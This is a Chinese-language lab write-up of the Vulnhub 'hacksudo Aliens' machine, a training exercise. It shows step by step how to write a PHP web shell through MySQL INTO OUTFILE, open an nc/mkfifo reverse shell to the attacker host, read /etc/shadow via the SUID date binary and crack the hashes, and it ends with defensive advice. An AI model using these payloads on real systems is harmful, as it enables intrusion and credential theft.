vulnhub系列6——hacksudo Aliens
字数 1205 2025-08-12 11:34:31
Hacksudo Aliens 靶机渗透测试教学文档
靶机概述
Hacksudo Aliens 是 Vulnhub 上的一个渗透测试靶机,难度中等,主要考察信息收集、Web 应用漏洞利用和 Linux 提权等技术。
环境准备
- 靶机 IP: 192.168.56.125
- 攻击机 IP: 192.168.56.105
- 工具要求: netdiscover, nmap, gobuster, nc, john 等
渗透测试步骤
一、信息收集阶段
-
网络发现
netdiscover -r 192.168.56.0/24 -
端口扫描与服务识别
nmap -sV -Pn -sC 192.168.56.125- 发现开放端口包括 80(HTTP) 和 9000(phpMyAdmin)
-
Web 目录扫描
gobuster dir -u http://192.168.56.125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi- 发现
/backup目录,内含 phpMyAdmin 的凭据
- 发现
二、Web 应用渗透
-
获取 phpMyAdmin 凭据
- 在
/backup目录下发现账号密码:账号: vishal 密码: hacksudo
- 在
-
检查 MySQL 安全设置
show global variables like '%secure%';- 确认
secure_file_priv未设置限制,允许文件写入
- 确认
-
通过 MySQL 写入 Web Shell
select '<?php system($_GET[1]);?>' into outfile "/var/www/html/test.php";- 创建了一个可通过 GET 参数执行系统命令的 PHP 文件
-
验证 Web Shell
http://192.168.56.125/test.php?1=id
三、获取初始访问权限
-
反弹 Shell
- 使用 URL 编码后的命令:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.105 6666 >/tmp/f- 在攻击机上监听:
nc -lvnp 6666 -
升级为交互式 Shell
python3 -c "import pty;pty.spawn('/bin/bash');"
四、权限提升
-
枚举系统用户
cat /etc/passwd- 发现存在
hacksudo用户
- 发现存在
-
查找 SUID 文件
find / -perm -u=s -type f 2>/dev/null- 发现
/usr/bin/date具有 SUID 位且可利用
- 发现
-
利用 date 命令读取敏感文件
LFILE=/etc/shadow /usr/bin/date -f $LFILE- 成功读取
/etc/shadow文件内容
- 成功读取
-
密码破解
- 将 shadow 文件中的哈希保存到
a.txt - 使用 John the Ripper 进行破解:
john a.txt- 成功破解出
hacksudo用户的密码
- 将 shadow 文件中的哈希保存到
-
切换用户
su hacksudo- 输入破解得到的密码
-
最终提权
- 利用 SUID 或其他提权技术获取 root 权限
关键知识点总结
-
信息收集
- 网络发现和端口扫描是渗透测试的基础
- 目录爆破可能发现敏感备份文件
-
Web 应用安全
- phpMyAdmin 默认安装可能使用弱凭据
- MySQL 的
secure_file_priv配置不当可能导致 RCE
-
权限提升技术
- SUID 二进制文件滥用是常见的提权方法
date命令的-f参数可用于读取任意文件- 密码哈希破解是获取用户访问权限的有效手段
-
后渗透技巧
- 反弹 Shell 的多种方法
- 如何将简单 Shell 升级为完全交互式 Shell
防御建议
-
MySQL 安全配置
- 设置
secure_file_priv为受限目录 - 避免使用弱密码
- 设置
-
系统加固
- 定期审计 SUID/SGID 文件
- 限制敏感文件的读取权限
-
Web 安全
- 避免在可访问目录存放备份文件
- 定期更新 Web 应用组件
-
密码策略
- 强制使用复杂密码
- 定期更换密码
通过这个靶机的渗透过程,可以全面了解从信息收集到权限提升的完整渗透测试流程。